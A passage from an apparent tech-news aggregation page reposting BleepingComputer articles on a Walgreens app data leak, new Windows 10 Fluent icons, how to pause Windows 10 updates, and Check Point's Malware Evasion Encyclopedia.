Walgreens is the second-largest pharmacy chain in the US right behind CVS Health, operating 9,277 drugstores and employing 230,000 people within all 50 states.

PII and PHI accidentally leaked
The data leak incident was caused by the unauthorized disclosure of secure messages within the Walgreens mobile app according to a data breach notification email sent by the company to affected customers.

The bug allowed "a small percentage of impacted customers" to view one or more personal messages containing limited health-related info of other app users "between January 9, 2020 and January 15, 2020."

Walgreens said that affected customers might have accidentally gained access and viewed sensitive information of others, including first and last name, prescription numbers and drug names, store numbers, and shipping address where applicable.

The company also said that "no financial information such as Social Security number or bank account information was involved in this incident."

The mobile app bug is now fixed
"On January 15, 2020, Walgreens discovered an error within the Walgreens mobile app personal secure messaging feature," the notifications says.

"Our investigation determined that an internal application error allowed certain personal messages from Walgreens that are stored in a database to be viewable by other customers using the Walgreens mobile app.

"Once we learned of the incident, Walgreens promptly took steps to temporarily disable message viewing to prevent further disclosure and then implemented a technical correction that resolved the issue.

"Walgreens will conduct additional testing as appropriate for future changes to verify the change will not impact the privacy of customer data."

While Walgreens didn't mention what mobile app was affected by the bug, at the moment the Walgreens iOS app has been rated by users more than 2,500,000 times in the Apple Store while the Android Walgreens app has over 10,000,000 installations.

Walgreens recommends customers monitor their prescription and medical records and shared the steps needed to be taken for protecting one's information at the end of the data breach notice.


Windows 10 1909 Starts Getting Microsoft's New Fluent Icons
7.3.2020 
Bleepingcomputer    OS

Ahead of schedule, Microsoft has started rolling out some of the new Fluent system icons to users running Windows 10 1909.

Earlier this month, Microsoft announced that they had rolled out new icons for the Mail and Calendar apps to Windows 10 insiders and that current Windows 10 builds would receive them over the coming months.

Microsoft appears to have moved up their plans as BleepingComputer has seen new Fluent-based icons in Windows 10 1909 for the Calendar, Mail, File Explorer, Your Phone, and OneDrive apps.

Rolled out Fluent icons to Windows 10 1909
Rolled out Fluent icons to Windows 10 1909
The new Windows 10 system icons utilize Microsoft's Fluent Design System, which is supported in Windows, iOS, Android, and web applications so that developers can create user interfaces and icons that are the same for every platform.

"The addition of color also gives a cohesive design language across platforms: the icon that’s familiar in Windows 10 is the same on Android, iOS, and Mac, providing a wayfinding path across your digital life," Christina Koehn, Principal Design Director at Microsoft, explained in a blog post. "The new rounded corners across the Windows 10 interface achieve the same goal: making these icons feel like they live in the real world; something familiar and approachable to grab onto."

The full gallery of Fluent icons created to replace existing Windows 10 system icons can be seen below.

Windows 10 Fluent Icons
Windows 10 Fluent Icons


How to Pause Windows 10 Automatic Updates To Avoid Critical Bugs
7.3.2020 
Bleepingcomputer   OS

Windows 10 as a 'service' is updated regularly and Microsoft recommends users to allow Windows to automatically install new updates as they are released. There are occasions, however, when you don't want to install an update due to fear of reported critical bugs or compatibility issues.

For example, just recently Microsoft pulled the KB4524244 update because of freezes, boot problems, and installation issues. A recent Windows 10 KB4532693 update is also causing issues with users losing their profiles, being logged into the wrong one, and in some cases losing data.

Due to this, some feel it's wise to pause Windows 10 automatic updates before a feature update release or other scheduled released to give Microsoft time to fix discovered bugs. Once it is determined that the update does not cause issues, you can unpause automatic updates and install the new fixes.

Thankfully, Windows 10 Home, Pro and Enterprise versions allow users to pause updates using the Windows Settings, the Group Policy, or Registry modifications, which we explain below.

Method 1: Pause updates via Windows 10 Settings
Previously, only Windows 10 Professional users were allowed to pause Windows updates from the Settings app, but that changed with Windows 10's May 2019 Update.

Now all Windows 10 versions can use the Windows Update settings to pause updates.

If you're on Windows 10 Home, you can pause updates for up to 7 days and Windows 10 Professional users can pause updates for 35 days.

To pause updates on Windows 10, please follow these steps:

Open Settings.
Go to Update & Security.
Click 'Choose Advanced options'.
Under the 'Pause updates' section, you will see a drop-down menu labeled 'Pause until'. You can use this drop-down menu to select a date that you wish to pause updates to.
Windows Updates

Once done, you can close the Settings window for the changes to go into effect.
Windows 10 will no longer check for new updates until the selected date is reached.

Method 2: Pause updates via Windows 10 Group Policy
Unlike Windows 10 Home, Windows 10 Pro comes with Group Policy editor and you can use it to disable automatic updates permanently.

To pause Windows Updates with Group Policy editor, follow these steps:

Search in the Start Menu for 'gpedit.msc' and select it when the result appears.
When the Group Policy Editor opens, navigate to the following path: Computer Configuration\Administrative Templates\Windows Components\Windows Update
Under the Windows Update section, you will see a policy called 'Configure Automatic Updates' as shown below. Double-click on the policy to open it.
Group Policy

To disable automatic updates in Windows 10 for an unlimited period, set this policy to 'Disabled'.
Editor

When done, click on the Apply and then OK button to save the policy.
Windows 10 will no longer automatically install updates, but you can still manually check for updates and install them via Windows Update.

To enable automatic updates again, set this policy to 'Not Configured'.

Method 3: Pause updates via the Windows 10 Registry
You can also manually create the above policy to permanently pause Windows 10 automatic updates for all versions of Windows 10 using the Registry Editor.

To pause Windows 10 automatic updates via the Registry, you would need to configure the following policy:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate"=dword:00000001

To do this via the Registry Editor, please perform the following steps:

Open Windows Run (W+R) and type Regedit.
In Registry Editor, navigate to the following path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Locate the Windows folder and right-click.
Select New and then Key. When prompted to name the key, give it the name 'WindowsUpdate' and press Enter.
Right-click this new key folder and click on New, then Key, and give the new key the name 'AU'.
On the right-side, right-click anywhere and select New > DWORD (32-bit) Value option and name the new value 'NoAutoUpdate'.
Double-click on the 'NoAutoUpdate' value and set its Value Data to 1.
When done, the new values should look like the image below.
New NoAutoUpdate value
New NoAutoUpdate value
Click OK and restart the PC.
Windows automatic updates will now be paused permanently until you delete the NoAutoUpdate value.


New Evasion Encyclopedia Shows How Malware Detects Virtual Machines
7.3.2020 
Bleepingcomputer   Virus

A new Malware Evasion Encyclopedia has been launched that offers insight into the various methods malware uses to detect if it is running under a virtual environment.

To evade detection and analysis by security researchers, malware may check if it is running under a virtualized environment such as virtual machine in VirtualBox and VMWare.

If these checks indicate that it is being run in a VM, the malware will simply not run, and in some cases, delete itself to prevent analysis.

The malware Evasion Encyclopedia
Created by Check Point Research, the Malware Evasion Encyclopedia is broken into different categories of information that a malware will use to detect if it is running under a virtual machine.

While sharing this information may allow malware authors to learn some new techniques, Check Point feels that the value to the information security community far outweighs any benefit to malware developers.

"It is our belief the value of sharing with the community is far greater than the risk of malware authors using this," Check Point Research told BleepingComputer.

The current sections in the encyclopedia with listed techniques are:

Filesystem
Registry
Generic OS queries
Global OS objects
UI artifacts
OS features
Processes
Network
CPU
Hardware
Firmware tables
Hooks
macOS​​​​​​​
Inside each section are code snippets that illustrate how malware determines if it is running under a virtual environment and suggested countermeasures to defeat these checks.

For example, the 'Processes' section shows how malware checks for certain processes used by VMs, the 'Firmware Tables' section explains how malware looks for certain strings in the BIOS, and the 'Generic OS queries' section lists user names that are commonly looked for.

Example evasion technique by checking for certain user names
Example evasion technique by checking for certain user names
When we asked if Check Point research plans on further updating the encyclopedia, they told us that they will continue to do so and welcome input from the information security community.

"We plan on maintaining this. Actually, this web site is just the “face” for a GitHub account with all the info. Anyone may submit pull requests and add his own technique if he spots one so the encyclopedia can be a valuable tool for everyone. Hopefully, this will help our community keep one step ahead of the bad guys," Check Point responded to us.

If you are building a virtual machine for malware analysis or just want to learn how malware attempts to evade detection, Check Point's encyclopedia is a great place to start.